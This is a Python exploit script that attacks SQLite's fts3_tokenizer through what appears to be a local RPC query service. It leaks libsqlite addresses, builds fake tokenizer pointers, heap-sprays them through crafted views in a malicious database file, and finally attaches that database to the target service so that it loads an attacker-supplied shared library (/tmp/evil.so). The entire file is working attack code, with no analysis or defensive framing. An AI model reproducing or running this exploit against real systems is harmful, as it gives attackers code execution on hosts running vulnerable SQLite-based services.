import os
import sys
import random
import string
import sqlite3
import json
import binascii

from api.skycore import ServiceManager
ServiceManager().get_service_python_api('skynet', 'skybone')

from skybone.rpc.client import RPCClientGevent
boneRPC = RPCClientGevent('/Berkanavt/supervisor/var/copier/rbtorrent/rpc.sock', port=None)

def sky_query(query):
    return boneRPC.call('query', query).wait()

def sky_gen_int2hex_map(prefix=''):
    sky_query("CREATE TABLE {}hex_map (int INTEGER, val BLOB);".format(prefix))
    for i in range(256):
        sky_query("INSERT INTO {}hex_map VALUES ({}, x'{}');".format(prefix, i, ''.join('%02x' % i)))

def gen_int2hex_map(prefix=""):
    conn.execute("CREATE TABLE {}hex_map (int INTEGER, val BLOB);".format(prefix))
    for i in range(256):
        conn.execute("INSERT INTO {}hex_map VALUES ({}, x'{}');".format(prefix, i, ''.join('%02x' % i)))


def math_with_const(output_view, table_operand, operator, const_operand):
    return "CREATE VIEW {} AS SELECT ( (SELECT * FROM {} ) {} ( SELECT '{}') ) as col;".format(output_view,table_operand, operator,const_operand)

def const(output_view, const):
    return "CREATE VIEW {} AS SELECT x'{}' as col;".format(output_view,const)

def p64(output_view, input_view):
    return """CREATE VIEW {0} AS SELECT cast(
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / 1) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 <<  8)) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 << 16)) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 << 24)) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 << 32)) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 << 40)) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 << 48)) % 256))||
    (SELECT val FROM hex_map WHERE int = (((select col from {1}) / (1 << 56)) % 256)) as blob) as col;""".format(output_view, input_view)


def u64(output_view, input_view):
    return """CREATE VIEW {0} AS SELECT (
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -1,  1)) -1) * (1 <<  0))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -2,  1)) -1) * (1 <<  4))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -3,  1)) -1) * (1 <<  8))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -4,  1)) -1) * (1 << 12))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -5,  1)) -1) * (1 << 16))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -6,  1)) -1) * (1 << 20))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -7,  1)) -1) * (1 << 24))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -8,  1)) -1) * (1 << 28))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -9,  1)) -1) * (1 << 32))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -10, 1)) -1) * (1 << 36))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -11, 1)) -1) * (1 << 40))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -12, 1)) -1) * (1 << 44))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -13, 1)) -1) * (1 << 48))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -14, 1)) -1) * (1 << 52))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -15, 1)) -1) * (1 << 56))) +
    (SELECT ((instr("0123456789ABCDEF", substr((SELECT col FROM {1}), -16, 1)) -1) * (1 << 60)))) as col;""".format(output_view, input_view)

def heap_spray(output_view, spray_count, sprayed_obj, sprayed_size):
    pat = "0"*sprayed_size
    replace = "replace(hex(zeroblob({0})), \"00\", input.col)".format(sprayed_size//2, sprayed_obj)
    repeat = []
    while spray_count:
        spray_count -=1
        repeat.append(replace)
    return "CREATE VIEW {0} AS SELECT ({1}) as col FROM (SELECT col from {2}) as input;".format(output_view, "||".join(repeat), sprayed_obj)


def flip_end(output_view, input_view):
    return """CREATE VIEW {0} AS SELECT
                SUBSTR((SELECT col FROM {1}), -2, 2)||
                SUBSTR((SELECT col FROM {1}), -4, 2)||
                SUBSTR((SELECT col FROM {1}), -6, 2)||
                SUBSTR((SELECT col FROM {1}), -8, 2)||
                SUBSTR((SELECT col FROM {1}), -10, 2)||
                SUBSTR((SELECT col FROM {1}), -12, 2)||
                SUBSTR((SELECT col FROM {1}), -14, 2)||
                SUBSTR((SELECT col FROM {1}), -16, 2) AS col;""".format(output_view, input_view)

def fake_obj(output_view, ptr_list):
    if not isinstance(ptr_list, list):
            raise TypeError('fake_obj_s() ptr_list is not a list') 
    ptrs = "||".join(ptr_list)
    return """CREATE VIEW {0} AS SELECT {1} as col;""".format(output_view, ptrs)

def flip_addr(addr):
    b = bytearray.fromhex(addr)
    b.reverse()
    return binascii.hexlify(b)

def sqlite_fns(simple_module_off, simple_create_off, unix_dl_open_off):
    # bootstrap
    try:
        sky_query("detach database sqliter_tmp")
    except:
        pass

    sky_query("attach database ':memory:' as sqliter_tmp")
    sky_gen_int2hex_map('sqliter_tmp.')
    bootstrap = [
        "create view sqliter_tmp.le_bin_leak as select hex(fts3_tokenizer('simple')) as col",
        flip_end("sqliter_tmp.bin_leak", "le_bin_leak"),
        u64("sqliter_tmp.u64_bin_leak", "bin_leak"),

        # calculate libsqlite base address
        math_with_const("sqliter_tmp.u64_libsqlite_base", "u64_bin_leak", "-", simple_module_off),

        # calculate simpleCreate address
        math_with_const("sqliter_tmp.u64_simple_create", "u64_libsqlite_base", "+", simple_create_off),
        p64("sqliter_tmp.p64_simple_create", "u64_simple_create"),

        # calculate unixDlOpen address
        math_with_const("sqliter_tmp.u64_dl_open", "u64_libsqlite_base", "+", unix_dl_open_off),
        p64("sqliter_tmp.p64_dl_open", "u64_dl_open"),
    ]

    for q in bootstrap:
        sky_query(q)

    ret = sky_query("select (select hex(col) from p64_simple_create), (select hex(col) from p64_dl_open)")

    # cleanup
    sky_query("detach database sqliter_tmp")

    return ret[0][0], ret[0][1]

if __name__ == "__main__":
    EVIL_SO_PATH = sys.argv[1] if len(sys.argv) > 1 else "/tmp/evil.so"

    print("[+] Calculate sqlite3 simpleCreate/unixDlOpen ptrs")
    simple_create_p64, unix_dl_open_p64 = sqlite_fns(
        simple_module_off=str(0xe97469520),
        simple_create_off=str(0xe971f90b0),
        unix_dl_open_off=str(0xe971d86a0),
    )
    print("[=] Done: simpleCreate = {} unixDlOpen = {}".format(flip_addr(simple_create_p64), flip_addr(unix_dl_open_p64)))

    print("[+] Generating malicious.db")
    DB_FILENAME = "/tmp/malicious.db"
    try:
        os.remove(DB_FILENAME)
    except OSError:
        pass

    HEAP_OFFSET = str(0xa0)
    conn = sqlite3.connect(DB_FILENAME)
    conn.execute("PRAGMA page_size = 512;")

    gen_int2hex_map()
    qop_chain = []

    print("[+] Generating heap leak statements")
    qop_chain.append("create virtual table leak_table using fts3(col);")
    qop_chain.append('insert into leak_table values("haha");')
    qop_chain.append("create view raw_heap_leak as select leak_table as col from leak_table;")
    qop_chain.append("create view le_heap_leak as select hex(col) as col from raw_heap_leak;")
    qop_chain.append(flip_end("heap_leak", "le_heap_leak"))
    qop_chain.append(u64("u64_heap_leak", "heap_leak"))
    qop_chain.append(p64("p64_heap_leak", "u64_heap_leak"))
    qop_chain.append(math_with_const("u64_heap_spray", "u64_heap_leak", "+", HEAP_OFFSET))
    qop_chain.append(p64("p64_heap", "u64_heap_spray"))

    print("[+] Generating heap spray statements")
    qop_chain.append(fake_obj('fake_tokenizer', [
        # iVersion
        "x'4141414141414141'",
        # xCreate
        "x'%s'" % simple_create_p64,
        # xDestroy
        "x'4242424242424242'",
        # xOpen
        "x'%s'" % unix_dl_open_p64,
    ]))
    qop_chain.append(heap_spray('heap_spray', 512, 'fake_tokenizer', 4*8))
    
    print("[+] Generating exploit triggers")
    qop_chain.append("create virtual table target using fts3(col, tokenize = 'porter');")
    qop_chain.append("create virtual table trigger using fts3(col, tokenize = 'porter');")
    qop_chain.append("drop table target_content;")
    qop_chain.append("create view target_content as select 0 as docid, (select col from trigger where col MATCH '{}') as c0col;".format(EVIL_SO_PATH))
    qop_chain.append("create view boom as select (select * from heap_spray) + (select * from heap_spray) + " + ('(select * from heap_spray) +'*128) + " (select fts3_tokenizer('porter', p64_heap.col) as col from p64_heap) + (select col from target)")
   
    print("[+] Save db file")
    for q_stmt in qop_chain:
        conn.execute(q_stmt)
    conn.commit()

    print("[+] All Done")

    print("[+] Trigger exploit")
    try:
        sky_query("DETACH DATABASE malicious")
    except:
        pass

    sky_query("PRAGMA page_size = 128;")
    sky_query("ATTACH DATABASE '/tmp/malicious.db' as malicious;")
    sky_query("select * from malicious.boom")